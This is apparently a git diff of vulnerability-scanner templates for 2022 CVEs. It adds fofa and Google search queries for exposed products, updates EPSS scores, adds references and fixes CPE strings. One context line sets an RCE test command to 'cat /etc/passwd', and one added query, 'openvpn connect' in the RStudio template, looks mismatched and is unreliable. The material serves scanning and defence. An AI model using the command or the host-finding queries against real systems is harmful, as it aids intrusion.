b/http/cves/2022/CVE-2022-35914.yaml @@ -30,6 +30,8 @@ info: vendor: glpi-project product: glpi shodan-query: http.favicon.hash:"-1474875778" + fofa-query: icon_hash="-1474875778" + google-query: intitle:"glpi" tags: cve,cve2022,glpi,rce,kev,glpi-project variables: cmd: "cat+/etc/passwd" diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index 2e554033b9..038cde1a2b 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -29,6 +29,8 @@ info: vendor: webmin product: webmin shodan-query: title:"Webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb http: diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 95d822f1fc..ee5bcbd447 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -30,6 +30,8 @@ info: vendor: zkoss product: zk_framework shodan-query: http.title:"Server backup manager" + fofa-query: title="server backup manager" + google-query: intitle:"server backup manager" tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss http: diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml index 02820f6e49..48df8a1532 100644 --- a/http/cves/2022/CVE-2022-36553.yaml +++ b/http/cves/2022/CVE-2022-36553.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36553 cwe-id: CWE-77 - epss-score: 0.46383 - epss-percentile: 0.9713 + epss-score: 0.56895 + epss-percentile: 0.97694 cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 3e07bba2f3..0ead5380fd 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -29,6 +29,8 @@ info: vendor: telosalliance product: omnia_mpx_node_firmware shodan-query: http.title:"Omnia MPX Node | Login" + fofa-query: title="omnia mpx node | login" + google-query: intitle:"omnia mpx node | login" tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance http: diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 6200beeadd..47cefc2342 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 - epss-score: 0.97343 - epss-percentile: 0.99886 + epss-score: 0.9735 + epss-percentile: 0.99894 cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index b22c9cf9a6..252a79d46f 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -28,6 +28,7 @@ info: vendor: articatech product: artica_proxy shodan-query: http.html:"Artica" + fofa-query: body="artica" tags: cve,cve2022,xss,artica,articatech http: diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 2676a9c412..dd4d1fcfa6 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-37190 cwe-id: CWE-732 - epss-score: 0.02018 - epss-percentile: 0.8771 + epss-score: 0.19055 + epss-percentile: 0.9625 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index 09f3c6f08e..cf8c6b4dbf 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37299 cwe-id: CWE-22 - epss-score: 0.00772 - epss-percentile: 0.80878 + epss-score: 0.00663 + epss-percentile: 0.79609 cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 38ea791bf2..54adc8e270 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3768 cwe-id: CWE-89 - epss-score: 0.01715 - epss-percentile: 0.86512 + epss-score: 0.02196 + epss-percentile: 0.89419 cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index c7bf808a41..75f4a12690 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38131 cwe-id: CWE-601 - epss-score: 0.0006 - epss-percentile: 0.23591 + epss-score: 0.001 + epss-percentile: 0.41301 cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: connect shodan-query: "http.favicon.hash:217119619" fofa-query: "app=\"RStudio-Connect\"" + google-query: intitle:"openvpn connect" tags: tenable,cve,cve2022,redirect,rstudio http: diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 910d6cdbc6..83dd277a75 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -30,6 +30,8 @@ info: vendor: servicenow product: servicenow shodan-query: http.title:"ServiceNow" + fofa-query: title="servicenow" + google-query: intitle:"servicenow" tags: cve,cve2022,servicenow,xss http: diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index faef6326e0..70954f8e2c 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 - epss-score: 0.00218 - epss-percentile: 0.5972 + epss-score: 0.00212 + epss-percentile: 0.5922 cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: creativeitem product: academy_learning_management_system google-query: intext:"Study any topic, anytime" + shodan-query: http.html:"study any topic, anytime" + fofa-query: body="study any topic, anytime" tags: cve2022,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index e66c68ee6d..53d563fb1d 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -30,6 +30,7 @@ info: vendor: hospital_management_system_project product: hospital_management_system shodan-query: http.html:"Hospital Management System" + fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project http: diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index 2975a09d86..6b1238c9e3 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -13,13 +13,16 @@ info: reference: - https://github.com/zyearn/zaver/issues/22 - https://nvd.nist.gov/vuln/detail/CVE-2022-38794 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 - epss-score: 0.00536 - epss-percentile: 0.7469 + epss-score: 0.00913 + epss-percentile: 0.82805 cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 8ab0162bf2..5953bb409d 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -15,19 +15,22 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817 - https://github.com/dapr/dashboard - https://nvd.nist.gov/vuln/detail/CVE-2022-38817 + - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38817 cwe-id: CWE-306 - epss-score: 0.01019 - epss-percentile: 0.82099 + epss-score: 0.0132 + epss-percentile: 0.8595 cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: linuxfoundation product: dapr_dashboard shodan-query: http.title:"Dapr Dashboard" + fofa-query: title="dapr dashboard" + google-query: intitle:"dapr dashboard" tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation http: diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index c3317573fc..3b0ea2c9ea 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38870 cwe-id: CWE-306 - epss-score: 0.01064 - epss-percentile: 0.83839 + epss-score: 0.01531 + epss-percentile: 0.8705 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: free5gc product: free5gc shodan-query: http.title:"free5GC Web Console" + fofa-query: title="free5gc web console" + google-query: intitle:"free5gc web console" tags: cve,cve2022,free5gc,exposure http: diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 09b8437870..b626b3b4e7 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39048 cwe-id: CWE-79 - epss-score: 0.01306 - epss-percentile: 0.8443 + epss-score: 0.02684 + epss-percentile: 0.9044 cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: servicenow product: servicenow shodan-query: http.title:"ServiceNow" + fofa-query: title="servicenow" + google-query: intitle:"servicenow" tags: cve,cve2022,xss,servicenow,authenticated http: diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 17f9d4d0d6..f2ae4ce67f 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-39195 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58386 + epss-percentile: 0.59024 cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: lsoft product: listserv shodan-query: http.html:"LISTSERV" + fofa-query: body="listserv" tags: cve,cve2022,xss,listserv,packetstorm,lsoft http: diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index a0550b3a6f..05ca9d4cce 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3980 cwe-id: CWE-611 - epss-score: 0.49036 - epss-percentile: 0.97431 + epss-score: 0.35251 + epss-percentile: 0.97125 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: mobile shodan-query: http.favicon.hash:-1274798165 fofa-query: title="Sophos Mobile" + google-query: intitle:"sophos mobile" tags: cve,cve2022,xxe,ssrf,sophos http: diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index a6d0caaa93..49ca77dcfc 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 - epss-score: 0.20211 - epss-percentile: 0.96236 + epss-score: 0.23569 + epss-percentile: 0.96565 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +29,6 @@ info: product: booking_calendar framework: wordpress tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart - variables: string: "CVE-2022-3982" diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index bbf0783c46..31b4fed0e4 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -29,6 +29,8 @@ info: vendor: fortinet product: fortinac shodan-query: title:"FortiNAC" + fofa-query: title="fortinac" + google-query: intitle:"fortinac" tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive variables: boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 74311099bb..d1bfdc403d 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-39960 cwe-id: CWE-862 - epss-score: 0.21326 - epss-percentile: 0.96012 + epss-score: 0.19471 + epss-percentile: 0.9629 cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 977beb7f8d..c284284b0f 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -30,6 +30,7 @@ info: vendor: raspap product: raspap shodan-query: http.favicon.hash:-1465760059 + fofa-query: icon_hash=-1465760059 tags: cve,cve2022,packetstorm,raspap,rce http: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index 4d2e1d1f67..fe13730e16 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 - epss-score: 0.82869 - epss-percentile: 0.98341 - cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* + epss-score: 0.77077 + epss-percentile: 0.98209 + cpe: cpe:2.3:h:microchip:syncserver_s650:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: microchip - product: syncserver_s650_firmware + product: syncserver_s650 shodan-query: html:"Symmetricom SyncServer" tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml index 85d799f96c..6876fc8541 100644 --- a/http/cves/2022/CVE-2022-40032.yaml +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40032 cwe-id: CWE-89 - epss-score: 0.00174 - epss-percentile: 0.54566 + epss-score: 0.00392 + epss-percentile: 0.73276 cpe: cpe:2.3:a:simple_task_managing_system_project:simple_task_managing_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index d4dae819da..33e6312cce 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -24,6 +24,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.html:"flatpress" + fofa-query: body="flatpress" tags: cve,cve2022,flatpress,authenticated,xss,intrusive variables: randstring: "{{to_lower(rand_base(16))}}" diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index 160bffd6a4..21577707d9 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.6 cve-id: CVE-2022-40083 cwe-id: CWE-601 - epss-score: 0.0212 - epss-percentile: 0.88046 + epss-score: 0.02362 + epss-percentile: 0.89807 cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 2ab8306634..3217751e6f 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-40127 cwe-id: CWE-94 - epss-score: 0.28782 - epss-percentile: 0.96752 + epss-score: 0.46431 + epss-percentile: 0.97434 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: apache product: airflow shodan-query: title:"Sign In - Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve,cve2022,airflow,rce,oast,authenticated,apache http: diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 224eae8487..7303890d0d 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -26,6 +26,8 @@ info: product: wp_user framework: wordpress publicwww-query: /wp-content/plugins/wp-user/ + shodan-query: http.html:/wp-content/plugins/wp-user/ + fofa-query: body=/wp-content/plugins/wp-user/ tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 38f1381f3f..7917c1968a 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-4050 cwe-id: CWE-89 epss-score: 0.04713 - epss-percentile: 0.9246 + epss-percentile: 0.92631 cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 9cc0272f1e..d295726da5 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -29,6 +29,8 @@ info: product: autooptimize framework: wordpress publicwww-query: /wp-content/plugins/autoptimize + shodan-query: http.html:/wp-content/plugins/autoptimize + fofa-query: body=/wp-content/plugins/autoptimize tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters http: diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index 4047f7f53e..cdb0f5b452 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -10,13 +10,14 @@ info: reference: - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d - https://nvd.nist.gov/vuln/detail/CVE-2022-4059 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4059 cwe-id: CWE-89 - epss-score: 0.01515 - epss-percentile: 0.85653 + epss-score: 0.02077 + epss-percentile: 0.89035 cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +26,8 @@ info: product: cryptocurrency_widgets_pack framework: wordpress publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ + shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/ + fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/ tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 892680e979..8164ade2d3 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 - epss-score: 0.04425 - epss-percentile: 0.92213 + epss-score: 0.08321 + epss-percentile: 0.9437 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 12eece546a..7f438f0a4f 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966 - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-40734 cwe-id: CWE-22 - epss-score: 0.01632 - epss-percentile: 0.86143 + epss-score: 0.10627 + epss-percentile: 0.95035 cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,7 @@ info: vendor: unisharp product: laravel_filemanager shodan-query: http.html:"Laravel Filemanager" + fofa-query: body="laravel filemanager" tags: cve,cve2022,laravel,unisharp,lfi,traversal http: diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 5cff18afee..da58a2fe39 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -18,13 +18,13 @@ info: cvss-score: 4.9 cve-id: CVE-2022-40843 cwe-id: CWE-287 - epss-score: 0.40937 - epss-percentile: 0.97197 - cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* + epss-score: 0.37501 + epss-percentile: 0.97193 + cpe: cpe:2.3:h:tenda:ac1200_v-w15ev2:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tenda - product: w15e_firmware + product: ac1200_v-w15ev2 tags: cve2022,cve,tenda,auth-bypass,router,iot http: diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 0132443048..432e1b7944 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-40879 cwe-id: CWE-79 - epss-score: 0.03708 - epss-percentile: 0.91567 + epss-score: 0.01698 + epss-percentile: 0.8773 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index 929886f5a0..db182f973a 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -14,19 +14,21 @@ info: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - https://github.com/advisories/GHSA-wx3r-88rg-whxq - https://nvd.nist.gov/vuln/detail/CVE-2022-40881 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-40881 cwe-id: CWE-77 - epss-score: 0.96169 - epss-percentile: 0.99389 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* + epss-score: 0.95977 + epss-percentile: 0.99469 + cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec - product: solarview_compact_firmware + product: solarview_compact shodan-query: http.favicon.hash:"-244067125" tags: cve,cve2022,solarview,rce,lfi,contec variables: diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index c6161c4c1e..47e9ed5811 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-4117 cwe-id: CWE-89 epss-score: 0.03413 - epss-percentile: 0.9123 + epss-percentile: 0.91452 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index 5af2d670a0..4c5cf2039d 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -17,15 +17,15 @@ info: cvss-score: 8.6 cve-id: CVE-2022-41412 cwe-id: CWE-918 - epss-score: 0.0012 - epss-percentile: 0.45431 + epss-score: 0.0224 + epss-percentile: 0.89541 cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 vendor: perfsonar product: perfsonar fofa-query: title="perfSONAR Toolkit" - verified: true tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar http: diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 9f6631c80e..55a5b61b57 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -30,6 +30,7 @@ info: vendor: reqlogic product: reqlogic shodan-query: http.html:"ReQlogic" + fofa-query: body="reqlogic" tags: cve,cve2022,packetstorm,xss,reqlogic http: diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index bfd1a094ab..b71b44fa26 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -30,7 +30,8 @@ info: vendor: rpcms product: rpcms shodan-query: http.html:"RPCMS" - tags: cve,cve2022,rpcms,xss,rpcms + fofa-query: body="rpcms" + tags: cve,cve2022,rpcms,xss http: - method: GET diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 45ed564efd..5db21049c2 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -29,6 +29,7 @@ info: max-request: 4 vendor: backdropcms product: backdrop + shodan-query: cpe:"cpe:2.3:a:backdropcms:backdrop" tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms http: diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 90bb990148..9f6cb66404 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -13,13 +13,14 @@ info: - https://github.com/bypazs/CVE-2022-42096 - https://nvd.nist.gov/vuln/detail/CVE-2022-42096 - https://backdropcms.org + - https://github.com/manas3c/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-42096 cwe-id: CWE-79 - epss-score: 0.00345 - epss-percentile: 0.68611 + epss-score: 0.0068 + epss-percentile: 0.79938 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index bbcead7f84..b04ac726d0 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -29,6 +29,7 @@ info: product: 11n_firmware shodan-query: http.title:"Tenda 11N" fofa-query: product=="Tenda-11N-Wireless-AP" + google-query: intitle:"tenda 11n" tags: cve,cve2022,tenda,auth-bypass,router,iot http: diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index d16dedd21d..58952063d7 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -30,6 +30,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index bd1e3f515d..9a9c3581ae 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -29,6 +29,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" 